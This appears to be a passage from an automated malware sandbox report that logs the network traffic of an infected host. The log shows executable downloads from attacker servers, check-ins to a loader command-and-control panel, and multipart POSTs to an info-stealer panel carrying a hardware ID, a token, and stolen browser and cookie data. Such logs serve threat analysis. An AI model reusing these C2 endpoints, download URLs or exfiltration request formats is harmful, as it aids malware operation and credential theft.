00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:59:21 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:59:21 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 14 Dec 2024 22:32:15 GMTConnection: keep-aliveETag: "675e076f-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 2f 79 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 ca 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 ca 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 79 66 70 69 70 6f 61 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 71 6c 70 72 76 68 77 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:59:33 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 14 Dec 2024 21:12:38 GMTConnection: keep-aliveETag: "675df4c6-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 76 6d 78 6b 6f 62 00 80 19 00 00 f0 2e 00 00 7a 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 64 61 77 61 6c 6d 68 00 10 00 00 00 70 48 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 48 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/6209411516/H9TU4oY.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015327001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/206321495/ZiYbk6W.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015343001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015352001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015353001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"stok------CBGCAFIIECBFIDHIJKFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="message"browsers------CAFIJKFHIJKKEBGCFBFH--
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="message"plugins------IEHCBAFIDAECBGCBFHJE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 2d 2d 0d 0a Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="message"fplugins------IDHIDBAEGIIIDHJKEGDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 185.215.113.206Content-Length: 6855Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015354001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 2d 2d 0d 0a Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KFIJJEGHDAEBGCAKJKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015355001&unit=246122658369
